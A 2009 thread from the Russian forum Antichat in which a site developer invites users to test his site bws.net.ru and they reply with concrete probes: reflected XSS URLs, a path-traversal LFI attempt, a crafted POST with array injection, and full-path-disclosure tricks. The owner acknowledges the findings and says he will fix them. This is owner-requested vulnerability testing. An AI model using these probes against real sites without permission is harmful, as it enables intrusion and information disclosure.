Форум АНТИЧАТ

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)

- - bws.net.ru (https://forum.antichat.xyz/showthread.php?t=128156)

DECIDE

03.07.2009 15:40

bws.net.ru

Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.

нужно проверить на уязвимости

Adm1n4eG

04.07.2009 10:59

http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script>
http://bws.net.ru/?nvg=crline:application"><script>alert()</script>

DECIDE

05.07.2009 21:21

спасибо, будет исправлено

Alexandr II

06.07.2009 06:30

PHP код:


		
			
http://www.bws.net.ru/?nvg=office:payment"><script>alert()</script>

их тут куча) + смотри

PHP код:


		
			
http://www.bws.net.ru/?nvg="><script>alert()</script>

админка вылазиет))) с какого боку?))

DECIDE

06.07.2009 08:51

их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал..

Tigger

31.12.2009 17:40

http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index

Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d

Tigger

31.12.2009 17:45

PHP код:


		
			
POST http://bws.net.ru/?com=subscription&cmd=add HTTP/1.0

Host: bws.net.ru

UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1

Connection: Close

Content-Type: application/x-www-form-urlencoded

Content-length: 17



eml[1]=loc@root.com

результат:
Warning: preg_match() expects parameter 2 to be string, array given in [path]

.Life

31.12.2009 19:34

вроде все теперь крикрыл, норм теперь...
но это конешно жеть было...
http://www.bws.net.ru/?nvg="><script>alert()</script>

Belov

01.01.2010 05:41

http://bws.net.ru/?com=%3C раскрытие путей

Byrger

05.01.2010 16:01

PHP код:


		
			
<select name="nskn[]" onchange=document.getElementById('fskn').submit()><option value="original" selected>original</select>

Пути

PHP код:


		
			
http://bws.net.ru/?nvg[]=invest

В меню вход в админку

PHP код:


		
			
http://bws.net.ru/?com[]=subscription

Пути

Время: 22:30

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице